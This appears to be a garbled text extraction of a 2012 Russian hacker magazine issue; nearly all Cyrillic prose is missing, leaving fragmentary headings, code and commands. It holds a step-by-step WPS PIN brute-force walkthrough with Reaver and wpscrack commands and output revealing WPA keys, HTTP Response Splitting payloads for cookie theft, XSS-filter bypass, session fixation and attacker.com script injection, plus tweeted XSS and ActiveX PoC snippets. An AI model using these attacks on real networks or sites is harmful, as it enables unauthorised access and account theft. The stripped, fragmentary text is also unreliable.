
GOOGLE CHROME

088

WWW.XAKEP.RU

03 (158) 2012

W3AF

: 230 .


WI-FI
018

WPS,
, .
5-10
WPA-.

024

082

124


HTTP RESPONSE SPLITTING


WINDOWS PHONE 7.5?

HIGHLOAD-
NGINX DJANGO

Intro

3 768

nikitozz (nikitoz@real.xakep.ru)
step (step@real.xakep.ru)
gorl (gorlum@real.xakep.ru)


PC_ZONE UNITS

UNIXOID SYN/ACK
MALWARE

PR-

step (step@real.xakep.ru)
(magg@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
Dr. Klouniz (alexander@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
(grigorieva@glc.ru)

DVD

Unix-
Security-

ant (ant@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
D1g1 (evdokimovds@gmail.com)

ART
-

(alik@glc.ru)


PUBLISHING
, 115280, ,
. ,19, , 5 , 21. .: (495) 935-7034, : (495) 545-0906


,
- .
,
.
,
~50
WINLINK.
,
.
,
, ,
3 768
, . : 250 , 50 , 1.2
. ,
,
, , : .
,
.
, (5 ) ,
, , 30 ! ,
!
: :).
P.S.
. :).
nikitozz, . .
shop.glc.ru/xakep
vkontakte.ru/xakep_mag

03/158/ 2012


.: (495) 935-7034, : (495) 545-0906


TECHNOLOGY

(filatova@glc.ru)
(olgaeml@glc.ru)
(alekhina@glc.ru)

(polikarpova@glc.ru)
( )
(tatarenkova@glc.ru)
(gospodinova@glc.ru)

(dubrovskaya@glc.ru)
-
(bulanova@glc.ru)

(korenfeld@glc.ru)

(kosheleva@glc.ru)
(lepikova@glc.ru)
(lukicheva@glc.ru)

:
DVD-: claim@glc.ru.

: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
: 101000, , , / 652,
,
77-11802 14.02.2002.
Scanweb, . 219 833 .
.
. ,
, . .
.

: content@glc.ru.
, , 2012

001

Content

008

HEADER
004
011

MEGANEWS

hacker tweets
-

14

QR-

016
017



Proof-of-concept
: Pastebin.com

COVERSTORY

030

COVERSTORY

COVERSTORY

018

024

Wi-Fi
10
WPA Wi-Fi

WPS

048

070

PCZONE
038
042
048

?
-

CAPTCHA

-
w3af

UNIXOID
104
108

110

052
056
062
066

070
074

Easy-Hack



PHP- Windows

I can crack it!
-,

SMS: 30 !

X-Tools

SYN/ACK
114
120

124

076

082


2011



130

138

094

096

100

Google Chrome

Google

/++


,


!
USB 3.0
Edifier R2500
2.0
WEXLER.BOOK T7055
, ,

140
143
144

088








nginx Django

FERRUM
136

MALWARE


Linux-

-
Fedora

Linux

110

FAQ UNITED
FAQ

8.5
WWW2
web-

MEGANEWS
WPS

WPS (Wi-Fi
Protected Setup)
,
US-CERT.
,
D-Link, Netgear, Linksys Buffalo.
,
PIN-,

.

PIN, ,

, Wi-Fi .
US-CERT :
PIN-
,
EAP-NACK .

, ,
PIN- .
, PIN-.

,
:
10^8 10^3 + 10^4, 11 .

Cover Story .

,
,

,
.

,



WPS.


( YOTA)

LTE .
63
,
150.


USB 3.0
, ,
. CES ,
2012 2013 .

LINUX MANDRIVA,

NGI,
.
,
.

GOOGLE
. British
Telecom
.

, APT-,

Sykipot, , ,
-, .
, -

.
Sykipot AlienVault.
ActivIdentity ActivClient,
-, .

PIN-, .
AlienVault ,
2011 ,
.

PIN-. Sykipot
.
, , ,
.

WINDOWS PHONE
MARKETPLACE
50 .
14
(Android Market
19).

IPHONE DEV-TEAM,
-,
iOS 5.01
iPhone 4S iPad 2.


.


MEGANEWS

23% - NAND Apple.

,
- ?

SOPA
PIPA

RAZER

:
10,1
1280 x
800 ,
Dolby
7.1 (
THX),
Wi-Fi 802.11b/g/n
Bluetooth 3.0.

.

Razer ( )
. , , Razer.
Project Fiona ,
CES 2012.
, , , .
(
) . , . , Project Fiona
Intel Core i7 . , Intel.
,
-
. , , . Razer . ,
.
$1000.

- .

ZAPPOS.COM 24
,



SOPA (Stop Online Piracy Act) PIPA
(PROTECT Intellectual Property Act),
, .
, , : (,
, .)
( )
.
,
. .

. , ,
, ,
.

, . , ,
. , , MPAA, RIAA
BSA ( Microsoft, Apple, Adobe,
Intel . .). Google, Twitter, Mozilla,
Facebook, Yahoo, eBay . X,
,
.
, ,
.
,

. Reddit . Google
. WordPress. blackout
.
SOPA. ,
GoDaddy, SOPA, -: GoDaddy.
,
TechCrunch , GoDaddy
- SOPA... ,
.

BSA, , SOPA . ,
, ,
.
SOPA 18
blackout,
. ? , SOPA, ,
, .
. PIPA . ? .
,
, ,
. . .


BUFFALO CLOUDSTATION
1

7

Buffalo

.
Windows,
MAC OS.
Time Machine.

Buffalo CloudStation
NAS.


: ,
.

BitTorrent-


iOS Android



(15017545 ),
,
, .

Webaccess
,
Buffalo.

,

: ,
.

Buffalo CloudStation

. ,
, ,
,
.


SATA-II
1 2 .
26 .
,
4
,
.

NAS', Buffalo
CloudStation BitTorrent-
web-.

p2p-: .


MEGANEWS

HMEI7 , Siemens.

QR-

MEGAUPLOAD



Megaupload, , , 4% -.
, , , .

Dotcom
. : 20 , 20
! ,
.
.
, Megaupload
. $500 .
,
( -)
$175 .
: , -
FileSonic
(, , ):
, , .
Anonymous
, , , RIAA,
MPAA , -
.


. QR,
,
.
Websense ThreatSeeker Network -,
QR-. , - .
2tag.nl , QR- URL. ,
QR-, .
QR-,
, (
QR-).
:
. ,

.

comScore, 14

18
34



QR-.

QR-
.

THUNDERBOLT
WINDOWS.
DigiTime. ( ), ,
Sony, Asus, Gigabyte Technology ASRock,
Thunderbolt .
.


IPV6-
2013 .
2015 IPv6

.

ANDROIDINVASION
GOOGLE , Google


.


,
GROUP-IB,
.
, IT-:
, Linux.
):
( ):

-
5

"

,
"

:


,

e,
Ariadn
.

, (
Group-IB) :

,
. , ,
:
iPad 2 Wi-Fi 3G 16 Gb.

,

.
:






.
!


:
www.xakep.ru/post/58241/

!
!

MEGANEWS

FACEBOOK Windows,


SAMSUNG PLS-
-
CES 2012
. CES , , , ,
.
, ,
S27B970 Samsung, 9-
-. 27-
, PLS (Plane Line
Switching). , IPS (In-Plane Switching)
Samsung. IPS-
, -
.
Samsung, , : PLS-, ,
,

, . . ,
Samsung .
S27B970 ,
(
- USB-),
.
9- 10 ,
.
QHD (2560 x 1440), DisplayPort,
Dual Link-DVI HDMI, 7 Mobile High Definition
Link (MHL)
.
Samsung Natural Color Expert,
. S27B970
,
,
- . , -
, Samsung 9
. ,
(!)
. -, ,
.
, (

),
. , .
, PLS
,
,
: PLS-
.
, ( , ,
). S27B970
$1199.

: 2560 1440
: 1,07
: 300 /2
(.): 90%
():
1000:1
(GTG): 5
(/.): 178/178

APPLE SAMSUNG
ELECTRONICS ,
GALAXY TAB 10.1
(!)


#hacker tweets
@NeckbeardHacker:

linux.js. ,
JavaScript-
Linux.
?

@cBekrar:

Chrome ASLR + DEP +


10 ? . #pwn2own
:

Vupen
PWN2OWN.
,
...

@meder:

: CVE-2011-3923.

Struts2: http://bit.ly/yFjhxr.
:


,
. , , Java
, RCE- ( ,
Java ), !
...

@RolfRolles:

-:

http://bit.ly/zIqZ5K .
:

... , ,
.

PhoneAndroid:

, -: ...
bit.ly/yoLmba.

Chroot-ing Windows
, :, :, :...
http://bit.ly/yQQqmN.
:

, ...
:

;).
@_sinn3r:

PoC McAfee SaaS


0-day (ZDI-12-012):
obj.ShowReport "calc.exe".

@cBekrar:

#fail-
McAfee Security-as-a-Service,
ActiveX,
bit.ly/xbJtqP via @thezdi.

obj.ShowReport
"calc.exe". ... .
, 0-day ZDI 12 . :) ...

@martincronje:

: HTML5 !=
CSS JavaScript-
jQuery.

@i0n1c:

,
!

...

...

@mikesica:

, ,
.

@jcran:

-- irb> (1..254).each
{|x| puts "host - 10.0.0.#{x}";
`smbclient -L 10.0.0.#{x}
-Uguest -N`}.
:

@f0rki:

PHP :
perchance (condition) { // Code
here } otherwise { // Code here }.

@garethheyes:

XSS- : <xml
ID=xss><x><IMG src=1
onerror=alert(1)></x></
xml><SPAN DATASRC=#xss DATAFLD=$Text
DATAFORMATAS=HTML></SPAN>.

Ruby- ...
@roman_soft:
@stephenfewer:



'Frinder' http://bit.ly/xrUBiW.


@Ivanlef0u:

BinScope:
http://bit.ly/yzcQYR .

NX, SafeSEH, /dynamicbase, . .


MEGANEWS


(CSDN).



,
,

,

- .
,


.

, (,
, ). ,
,
, . ,

, .
: ,
.
. !
. . :) , ,
.
. , . , , -
, , ,
.
: webpolit.livejournal.com/72397.html.


Seagate

Samsung .

$1,375 .


NGINX
,
Microsoft IIS. NetCraft,
Apache
(57,93 %).

THE PIRATE BAY


TORRENT- magnet. magnet-URL

.

BSOD WINDOWS 7



Windows 7 x64
w3bd3vil.
win32k.sys
( Win XP),
. , 32-
, 64-
- BSOD,
.
: ,
, ,
. , HTML-. Safari ,
.
iframe
. 64-
Windows 7, , ,
.
.

TORRENTFREAK , Crysis 2

BitTorrent PC
2011 . Call
of Duty: Modern Warfare 3
Battlefield 3.


Twitter

Google . Google .


GOOGLE MOZILLA Firefox.

MICROSOFT,
ARM-

.
, EDIFIER

Microsoft
,
. , .
2011- Microsoft ,
Windows 8 Secure boot (

UEFI). : UEFI
. , , , UEFI. ,
. Linux-
,
Linux ,
- Linux Windows 8
.
Microsoft ,
Linux ,
, . ,
Windows,

. ,
.
Microsoft ,
Windows 8. , ,
. .
, Windows 8 ,
116: , ARM, Secure Boot
.
Secure Boot , Pkpriv.
Secure Boot UEFI
,
.
, Microsoft ,
Secure Boot,
, ARM-. , ARM,

.
Linux ( ) . ,
, Windows 8,
Linux .
: ?
, .
,
. ,
UEFI, .
, , Microsoft
, Linux, Android ARM-.

Edifier
. 2.0.
- R1500TM ,
. Edifier
( ), -
18- . ,
RCA, , .
R900T.
2.0-, 4-
- 13-
, ,
. R900T
: 140 226 197 .
3,5-
RCA RCA RCA,
, , .


:
Edifier

12

.
.




.

MEGASEARCH.CC

,




MEGANEWS

SECURITY RESEARCH LABS GSM. .

!
,

PWN2OWN


Pwn2Own,

,
(,
) . ,

. Microsoft
Internet Explorer, Apple Safari,
Google Chrome Mozilla
Firefox Windows 7 Mac OS Lion
( ).

.
Hewlett-Packard.
60 , 30
15
, .
Google
Chrome. 20 sandbox-
Chrome. 10
sandbox- Chrome,
.
,
Pwn2Own. , .
.
,
.
Pwn2Own 7 9 . , !

D- , .
( ,
iModela)
,
, .

, , .
, .
-
The Pirate Bay
3D-, -
.
- ,
.

Warhammer 40 - 1970 .
, , 3D- .
,
!
, ,
. ,
.


3D-
RepRap

,

.

Mendel,

(
).


$520.

SONY
XQD.

, .
\
XQD
1 / (125 /).
.
QD-H16 16
$130, QD-H32 32 $230.

.




FACEBOOK HACKERCUP,
.
- Facebook,

.

TIOBE SOFTWARE
OBJECTIVE-C
.

-
Java, C,
C# C++.


SYMANTEC


Symantec,

,
, . Symantec,
, 2006 .
, .
, Norton Antivirus Corporate Edition, Norton
Internet Security, Norton SystemWorks pcAnywhere 12.0,
12.1 12.5. ,
Yama Tough, ,
Lord of Dharmaraja, ,
Norton Utilities.
,
,
Norton Antivirus. , ,
1999 . , Symantec ,

. .
,
. ,
Symantec ( ).
,
, ,
. Symantec
,
scareware-, , .
Symantec,
, , .
, ,
.


LUMINANT MEDIA
93-

ANONYMOUS

HEADER





.

.

KeyPass (keepass.info),
.
,
, . ,
,
? :)
, ,
, KeyPass,

, !
.

1Password (agilebits.com/onepassword), Mac,
Windows.
, $69.99

. , . , -,

LastPass (lastpass.com),
. ,
. -,
(Windows, Linux, Mac),
.
(Firefox, Internet Explorer, Chrome, Safari,
Opera). ($1 )

. -, LastPass
,
,
.
- ,
.
- ,
. -, LastPass ,



Dropbox.
- ( ),

. ! :)

LASTPASS
, LastPass, .
, .

LastPass ,
. , Sesame

-.

. -,
Sesame .


, ,
-. !
LastPass
Sesame ( ), ,
, .

Google

Yubikey $25
(store.yubico.com), Google. ,

(Google Authenticator),
.
Gmail,
LastPass.
(helpdesk.lastpass.com/security-options/
google-authenticator).
,
.
$12
.

LastPass

LastPass


,
, . LastPass

, ( 123456). ,
,
.


Proof-of-Concept

PASTEBIN.COM

- Pastebin.com.
,
,

. .
, .
Lulzsec
( , ) Pastebin.com.
. (pastebin.
com/trends) , :
- Facebook;
- , e-mail
;
IP-
.

:
.
. .
, , ,
.
, , Pastebin.
com, :
Pastie, FrubarPaste, YourPaste, Codepad, Slexy
LodgeIt. PoC
. ,
,

.


, , .
: , malc0de (bit.ly/An58Yd)
NeonTempest (bit.ly/zRuK7o). , ,
PastyCake 9b+ (bit.ly/xHXdfH),
.

Pastebin.com Pastie.org ,
.
SQLite.

MongoDB MySQL. -

Python, :
python gather.py -k kwords -o urls.db \
-a ~pastycake@gmail.com~ harvest

'harvest'
.
e-mail.
-o
. -k
,
. , ,
, . ,

, , .
,
PastyCake, , :
DEFAULT_KEYWORDS = [
'password',
'hack',
]

,
, .
.


, ,

.
, Twitter- PastebinLeaks (twitter.com/#!/
PastebinLeaks), -
Possible Massive mail/pass leak
http://pastebin.com/L6YbD136
Possible listing of http passwords
http://pastebin.com/qZbccMB7
Possible Juniper configuration with
password http://pastebin.com/9vuwzjnS
..

Python


Trending Pastes ?

,
. z


COVERSTORY

(ivinside.blogspot.com)

WPA-
WI-FI

WPS


HOWTO: Wi-Fi 10

HOWTO:
WI-FI
10
, ,
WPA2, .
. - ,
, GPU. ,
,
WPS.


WWW

WARNING

,

Google
Docs:
goo.gl/3zjfP




.
.


COVERSTORY
PIN- bruteforce. .

WPS

PIN- WPS

1. PIN- WPS,


,
,
. ,
.
,
,
,
.
, ,
.
/
. ,

.
WPS (Wi-Fi Protected Setup).

,
, - WPA-.
PIN,
, !
. WPS.
. ,
WPS (, ,
), PIN
!

2. PIN- WPS


() (),
.
.
2. PIN- -.
PIN- ,
( 1),
.
,
.
3. PIN- ( 2).
WPS,

,
PIN-. .
.
! ,

, PIN-
,
10^8 (100 000 000) . . ,
PIN- , .
10^7 (10 000 000) .
! WPS (
3). , ,
. , PIN-
.
, ! :
1. M4 EAP-NACK,
, PIN-
.
2. EAP-NACK M6, , ,
PIN- . 10^4 (10 000)
10^3 (1
000) .
11 000 .
, ,
.
3.
. WPS-:

WPS?
WPS .
.
, -
.
(, ):
PIN, . ,
(Cisco/Linksys,
Netgear, D-Link, Belkin, Buffalo, ZyXEL)
WPS. .

WPS:
1. Push-Button-Connect (PBC).


3. WPS


HOWTO: Wi-Fi 10

, .


-, M3.
,
,

. ,

,
.



wpscrack (goo.gl/9wABj), Python.
Scapy, .
Linux-,

.

, MAC- , MAC-
(SSID).
$ ./wpscrack.py --iface mon0 \
    --client 94:0c:6d:88:00:00 \
    --bssid f4:ec:38:cf:00:00 --ssid testap -v
sniffer started
trying 00000000
attempt took 0.95 seconds
trying 00010009
<...>
trying 18660005
attempt took 1.08 seconds
trying 18670004 # found 1st half of PIN
attempt took 1.09 seconds
trying 18670011
attempt took 1.08 seconds
<...>
trying 18674095 # found 2st half of PIN
<...>
Network Key:
really_really_long_wpa_passphrase_good_luck_cracking_this_one
<...>

,
PIN-, ,


. ,
,
(61 )
.
, wpscrack
,
:


Tactical Network Solutions. ,
PoC ,
Reaver (code.google.com/p/reaver-wps).

WPS-PIN PSK-, ,

.

.
,

WPS .

HOW-TO
, Linux.
, Reaver BackTrack
(backtrack-linux.org),
-

- WI-FI
1. WEP (Wired Equivalent Privacy)
.

,
RC4.
airodump-ng
aircrack-ng, .
wesside-ng,
WEP
.
2. WPA/WPA2 (Wireless Protected Access)
-


WPA/WPA2 (

WPA Handshake,
). ,
. , ,
, NVIDIA
CUDA ATI Stream
GPU. aircrack-ng ( ),
cowpatty ( ), pyrit
( ).

4. - PIN- WPS

.
.
0.
BackTrack 5 R1
VMware
ISO. .
,
UNetbootin (unetbootin.
sourceforge.net) :
, ,
, .
1.

root:toor. ,
(
BackTrack GNOME, c KDE):
# startx

2. Reaver
Reaver,
.

(Applications Internet Wicd Network
Manager). ,
:
# apt-get update
# apt-get install reaver

, 1.3,
. , ,


COVERSTORY
, , SVN. , ,
(
).
$ svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps
$ cd ./reaver-wps/src/
$ ./configure
$ make
# make install

BackTrack
.
Arch Linux, ,
, PKGBUILD:
$ yaourt -S reaver-wps-svn

3.
Reaver :

;
;
MAC- (BSSID);
, WPS.
,
:
# iwconfig

( wlan0) ,
( ,
Reaver, ).
:
# airmon-ng start wlan0

,
(
mon0).
BSSID.

airodump-ng:
# airodump-ng mon0


.
WPA/WPA2
PSK. ,
.
,
kismet,
. ,
WPS. Reaver (
SVN) wash:
# ./wash -i mon0


, .
-f cap-, ,
, airodump-ng.
Reaver BackTrack wash. ,
.
4.

PIN. Reaver
.
(
) BSSID
:

6. Reaver Pro Reaver

# reaver -i mon0 -b 00:21:29:74:67:50


-vv

-vv
, ,
.
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from 00:21:29:74:67:50
[+] Associated with 00:21:29:74:67:50 (ESSID: linksys)
[+] Trying pin 63979978

PIN , ,
, .
. ,
PIN,
. , :
[+] Trying pin 64637129
[+] Key cracked in 13654 seconds
[+] WPS PIN: '64637129'
[+] WPA PSK: 'MyH0rseThink$YouStol3HisCarrot!'
[+] AP SSID: 'linksys'

, ,
WPA-PSK, . ,
.

5. c Reaver



WPS . , ,
.
, , ,
, . ,
,
. ,
WPS
PIN-,
90 . ,

,
? z


HOWTO: Wi-Fi 10

FAQ

?
,
A ,
.
Aircrack-ng (bit.ly/wifi_
adapter_list). ,
,

RTL8187L. USB
$20.


"timeout" "out of order"?
-
A
. ,
WPS.

Reaver
, WEP
?
WEP
A
,
(IV),
. ,
- , -

.
WPS

Reaver
PIN-. -
,
,
WPS-. WPS

. ,
,
,
.

ALFA Network
dBi, ,

.

MAC-?
, MAC A mon0,
.
, , wlan0.

Q
A

Reaver
PIN, ?
,
WPS. -

wash: ,
.

Q ?
-
A ,
.

"rate limiting detected"?
,
A WPS.
(
),
(
).
Reaver
1.3, -
.
'--ignore-locks'
SVN.


Reaver
?
,
A ,
,

REAVER
HOWTO
Reaver. WPS
,
. ,
.

5. WPS
, , . Reaver
315 ,
:
# reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250

1. SSID :
# reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys
2. '--dh-small',
,
:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small
3. .
:
# reaver -i mon0 -b 00:01:02:03:04:05 -t 2

6. WPS
PIN-,
. Reaver ,
'--nack':
# reaver -i mon0 -b 00:01:02:03:04:05 --nack
7. '--eap-terminate' ,
WPS- EAP FAIL:
# reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate

4. .
:

8. WPS- ,
PIN-,
. Reaver ,
'--fail-wait':

# reaver -i mon0 -b 00:01:02:03:04:05 -d 0

# reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360


COVERSTORY

d0znpp (ONsec, http://oxod.ru)

DVD





.




, 2002

HTTP- ,
,

.


,

PHP.

WWW

CRLF PHP Internet Explorer 7/8/9.


%0d%0d%20 (%09)

bit.ly/ACOlSL Goodbye HTTP Response


Splitting, and thanks
for all the fish (Stefan
Esser).
bit.ly/wB9QGz


#1.
bit.ly/ABOwbr


#2.
bit.ly/aWQGqx


#3.
IE XSS
(X-XSS-Protection)


INTRO
: .
, . ,
-
, , , .
(, eval) ,
$_GET['aaa']. ,
. , ,
, .
? ,
- , , .

,
, ,
HTTP Response Splitting.
HTTP-. - ,
HTTP- (
).
, , HTTP-
. ,


HTTP-
, Cache Poisoning, Cross-site Scripting (XSS) , , Page Hijacking.
cPanel 2010 .
, header("Location:
".__).
:
http://server.com:2082/login/?user=foo&pass=bar&failurl=
%0D%0AContent-Type:%20text/html%0D%0A%0D%0A%3Cscript%3Eale
rt%28%22
Recognize-Security%20-%20%22%2Bdocument.cookie%29;%3C/
script%3E%3C!--

XSS:
HTTP/1.1 307 Moved
Server: cpsrvd/11.25
Connection: close
Content-length: 206
Location:
Content-Type: text/html
<script>alert("Recognize-Security - "+document.cookie);
</script><!-Content-type: text/html
<html><head><META HTTP-EQUIV="refresh" CONTENT="0;URL=
Content-Type: text/html


COVERSTORY
&lt;script&gt;alert(&quot;Recognize-Security &quot;+document.cookie);
&lt;/script&gt;&lt;!--"></head><body></body></html>

, -
header("Location: "
.$_GET['backto_url']) header("Location: /index.
php?lang=".$_GET['lang']). Open Redirect,
. ,
HTTP
Response Splitting, ,
PHP ( 2006- ) %0d%0a .
,
.
header() , , ,
.

DISCLAIMER

ZeroNights, . ,
,
, cookies.
, ,
, smuggling-,
.

PHP 4.4.2 5.1.2 ,



. , PHP
4.4.2 5.1.2,
:

HTTP
( HTTP), , HTTP-.
bit.ly/r9pLL, 6 Response (bit.ly/BEAq4).
HTTP- :
RFC-2616
Response = Status-Line; Section 6.1
*(( general-header; Section 4.5
| response-header; Section 6.2
| entity-header ) CRLF); Section 7.1
CRLF
[ message-body ]; Section 7.2

,
CRLF, . URL CRLF %0D%0A.

. ,
CRLF,
.

CRLF PHP
header() (bit.ly/wVbbcd) PHP
HTTP- . . , -

<?php
header("Location: /basic/".$_GET['redirect'].".html");
?>


Warning, :
test.php?xxx=bbb%0a%0dNew-Header:blabla
Warning: Header may not contain more than a single header, new line detected. in test.php on line 2

,
. ,
:
/* new line safety check */
char *s = header_line, *e = header_line + header_line_len, *p;
while (s < e && (p = memchr(s, '\n', (e - s)))) {
    if (*(p + 1) == ' ' || *(p + 1) == '\t') {
        s = p + 1;
        continue;
    }
    efree(header_line);
    sapi_module.sapi_error(E_WARNING, "Header may not contain more than a single header, new line detected.");
    return FAILURE;
}

,
LF ( URL- %0A). , - (%09) (%20), . ,
CRLF, LF-. RFC,
, . , RFC
? , . - :

,
Refresh-


<?php
header("X-Test1:1\r\n Set-cookie: is1=OK");
header("X-Test2:2\r\n\tSet-cookie: is2=OK");
echo "<script>alert(document.cookie)</script>";
?>


, Internet Explorer
. , - RFC
, ,
header() IE, ,
Open Redirect. .
.

header() 2006

,
.
Internet Explorer. , .
, PHP %0a (\n LF).
, - ,
.

.
:
#!/usr/bin/perl
use strict;
use warnings;
use Socket;
. . .
listen SERVER, 10;
# Build a response with 256 Set-cookie headers, each terminated by a different byte value
my $answ = "HTTP/1.1 200 OK\r\n";
for (my $i = 0; $i < 256; $i++) {
    $answ .= "Set-cookie: cook-$i=1" . chr($i);
}
$answ .= "\r\n\r\n<h1>Test splitting bytes</h1>";
. . .

: ,
- (, ,
) ,
CRLF (%0d%0a). -,
HTTP- ,
Set-cookie, 256 .
, - ,
, ,
<N>Set-cookie:... , ,
, , , . ,
, :-). ,

( ).
:
IE 8/9 %0d
Firefox 7 Opera %0d
Chrome %0d %00 (Issue 95992 fixed in rel. 15)
Safari %0d

, , Firefox, CR , CRLF.
,
,
- -! , ,
, 14- Google Chrome,
-


setcookie()

setcookie()

-. . 95992 Low (
,
, , , ).
15- - ,
, , 17-
. Firefox ,
, RFC. ,
.

XSS
header(),
.

.
client-side-: ,
.
, Content-Length,
, HTTP-.
header() PHP Content-Length 0, . ,
HTTP Response Splitting ( HTTP-)
, Content-Length .
, . , Internet Explorer,
, HTML- , Content-Length.
6- 9- .
-:
<?php
header("X-Header: aaa".$_GET['r']);
?>

Internet Explorer
HTTP-:


COVERSTORY

/index.php?r=foobar%0d<html>%0d<h1>TEST</h1>

. , .
XSS-,
:
/index.php?r=foobar%0d<html>%0d<script>
alert(/Splitting/)</script>

, - , . ,
,
. XSS- Internet Explorer,
9-
, , , X-XSS-Protection: 0. ,
,
.
HTTP- :
/index2.php?r=foobar%0dX-XSS-Protection:0%0d<html>%0d
<script>alert(/xss/)</script>

. IE , X-Content-Type-Options,
. . : ( Content-Length).
, header("Location: /index.php?lang=".$_GET['lang'])
Open Redirect
?lang=aaa%0dLocation:http://yandex.ru. ,
, .
( ), .
, Access-Control-Allow-Origin ,
, Opera,
Internet Explorer 8+, Firefox 3.5+, Safari 4+ Google Chrome.
(mzl.la/4srnwm).
,
Access-Control-Allow-Methods, Access-Control-Allow-Headers, Access-Control-Max-Age (
).
, , . Access-Control-Allow-Origin ,
. , , , XHR . ,
Access-Control-Allow-Origin: *
.


RFC, , ,
, , , .
Internet Explorer HTTP-.
,
, .
, Content-Length
, , RFC, HTTP
. ,
, .

, header(). , - ,
. , , : header(), setcookie() setrawcookie().
, ,
header(), $path $domain.
,
. ,
. .
,
header():


, Content-Length, , HTTP-
.
, , X-XSS-Protection,
XSS- Internet Explorer,

if (name && strpbrk(name, "=,; \t\r\n\013\014") != NULL) {
    /* man isspace for \013 and \014 */
    zend_error( E_WARNING, "Cookie names can not contain any of the following '=,; \\t\\r\\n\\013\\014'" );


1. X-Frame-Options. ,

iframe/frame-.
X-Frame-Options:
allow-from attacker.
2. X-Content-Security-Policy.
,
. ,
X-Content-Security-Policy: allow 'self', <script src="http://attacker.com/1.js"><script>
. ,
X-Content-Security-Policy: allow http://*:80.


3. Refresh. Refresh.
HTML data Open-redirect: Refresh: 1,data:text/
html,<h1>OK</h1>. Chrome
script. , ,
,
data-,
XSS.
4. Set-cookie.
.
,
( )

,
, ,

.
: foobar:%0dSetCookie:PHPSESSID=FAKED%0dLocation=/
auth.php. ,
,
.
99 % -
Session Fixation (
).


IE HTML- Content-Length,

    return FAILURE;
}
if (!url_encode && value && strpbrk(value, ",; \t\r\n\013\014") != NULL) {
    /* man isspace for \013 and \014 */
    zend_error( E_WARNING, "Cookie values can not contain any of the following ',; \\t\\r\\n\\013\\014'" );
    return FAILURE;
}

strpbrk() ,
. ,

.
.
(, ) strpbrk (php.su/functions/?strpbrk),
. , ,
- ! , PHP
,
- ,
. - .
, . ,
, = .
( 2010
).

COOKIES
- , ,
. setcookie() setrawcookie()
.
. , .
,
, .
, .


,
, .
, , :
<?php
setcookie("param0","PREFIX_".$_GET['p0']);
?>

4096 . , .
! ,
, .
Session Fixation.

:


XSS- IE

chrome 4096
safari 4091-LEN(cookie_name)
opera 4096
firefox 4096
iexplore 5116-LEN(cookie_name)


, RFC: www.ietf.org/rfc/rfc2109.txt.
RFC at least
20 cookies per unique host or domain name. , 20 20
. . , 1997-
, ,
, .
, RFC, ,
, , .
:
chrome 180
safari ~2800/LEN(cookie_name+cookie_val)
opera 60
firefox 149
iexplore 49

, 20, - 10000 :-). ,


Opera Chrome,
.
,
. ... . PoC Opera Chrome .
, (N+1)- ?
- . , ? ? , ,
. ? , !
Opera Chrome!
,
, , , ,
. , . , ,
. ,
(Chrome, Opera).

OUTRO

, .
,
HTTP Response Splitting, . ,
.
(oxod.ru).
! z


COVER STORY

rabota.ru,
.Ru.
@Mail

il.Ru Group.
- Ma

PRUFFI.



.
, ,
. ,
.
. ,
.
, , .
, .

, Gmail -
.
, ,
Google. :)

, . ,
PRUFFI .

. 5060
, .

800 .
PRUFFI 60 000 90 000 . . :)

PRUFFI FRIENDS


- .

?
, .
, ,
15
:
, .
,
.
.

PRUFFI Friends (apps.facebook.com/pruffi_


friends). , . ,

.
,
:
,
.

.

.
,
. ,
800 ,
?
,
?
.
. , , .

. ,
.

, .

. , ,
,
. -
,
,
1000 .
.

.
, ,
.
PRUFFI .
: 400
. 600 .
- : , - 700

1,5 .
,
(pruffi.
ru/analitika). , , 3040 % , . ? .
, Ruby
100
, ,
.
Ruby- 60 ,
, .
,
.

?

!
, IT .

, .
,
20 , !. ,
.
, ,

.
, (Product Manager'),
, 30. ? ,
. ,

. :) :
,
( ), . ,
. .
,
.


COVER STORY
-, :
,
.
- !
. HR-: ,
.
. ,
. :)
. .
. .
, ,
.
Facebook Google,
Foursquare, LinkedIn
. , ,
LinkedIn, - , Groupon.
! ,

.
, . ,

, .
( -)
, ,
. Zynga
, .
Zynga,
, .
.
PRUFFI
.
.
: $500 000
$500 000.
.
,
,
: ,
,
.
!

. ,
,
.
,
, ,
( /IT,
, , ). ,
, , ,
,
.
, .


.
. , ,
, -,

. .

? , , -,
,
(iOS,
Android, Symbian, Windows
Phone), .
.
.
.
:
PM (Product manager),
, PM,
. , ,
. :
, ,
. :

,
,
.
. , Omlet.ru,
Enter.ru . . .

.
, .
, . ,
.
. , , ,
,
.

Ostrovok.ru.
.

,
, .
, ,
. , , .
,
:
.
,

200 000 .
. , , ,
180200 .
100120
.
, - 140
. .



.
,
,
. . .
. ,
,
,
.
.
.
, , .
.
, PM
. ,

,
. . ,
. ,
-
, .
, ,

. :) ,

,
Molotok.ru,
Mail.ru.


:
1. Ruby 86 %,
40 %.
2. , , , .
3. .
4. , e-commerce,
50 %.
.
iOS Android. ,

-


.

, .

.

, ,
, ,
.
.


, .
, ,

. , - .

. ,
.

,

. :
,
.
, . Mail.ru :

, ,
.
,
.
, Mail.ru Group
. ,


. Futubra (futubra.com).


.
:
.

. .

, .
.
.
.

PHP-
Perl-.
Perl, , , . , Ruby,
Perl ,
C++ Java.
. . .

NDA (Non-disclosure
agreement ).

.
: ,
. - .
, . ,
- .
. . , Mail.ru,
, , .
, .
,
, -
. , . ,
- .

. , .
-


. ,
.
. ,
.
: .,
,
, .
, ,
Ruby. , .

: ,
HR-, , ? .
, .
,
,
. .
,
, .
: , ! !
, . ,
- ,

.
,
. .
, ,
,
.

.

, ,
. , ,
,
,
.
,
,
.
- ,
, .
. HR 90
. :
60 120
.
150, 60. .

1015 , 34
. HR
: .


. ,
. Google

,
.
.


.
, ,


COVER STORY
, ,
,
.

, , . ,

.
,
. , , .
, .
: ,
, ,
. ,
, ,
!. .

. , , PM, ,
.

, .
, , !

.

.

,
.
,
, , ,
, ,

.

?
, , ,
- , . , ,
.

. , .
.
, 19
: !


. ,
,

,
